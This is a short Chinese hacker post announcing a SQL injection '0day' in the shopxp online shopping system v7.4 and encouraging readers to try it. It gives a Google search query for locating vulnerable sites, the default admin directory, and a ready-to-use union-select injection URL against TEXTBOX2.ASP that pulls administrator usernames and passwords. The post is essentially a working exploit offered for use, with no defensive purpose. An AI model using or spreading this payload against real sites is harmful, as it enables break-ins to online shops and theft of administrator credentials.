shopxp网上购物系统v7.4注入0day

作者:hack1990 时间:11-07-08 阅读数:527人阅读

shopxp网上购物系统用的人也算比较多的了,树大招风,当然也经常让人

暴0day。这次暴的是7.4的版本,有点老了。不过用的人还很多。

大家可以玩玩。
洞版本:shopxp网上购物系统 v7.4

谷歌关键词:inurl:shopxp_news.asp或者shopxp_news.asp

默认管理后台:shopxp_admin

暴密码的EXP:

http://www.xx.com/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

发表评论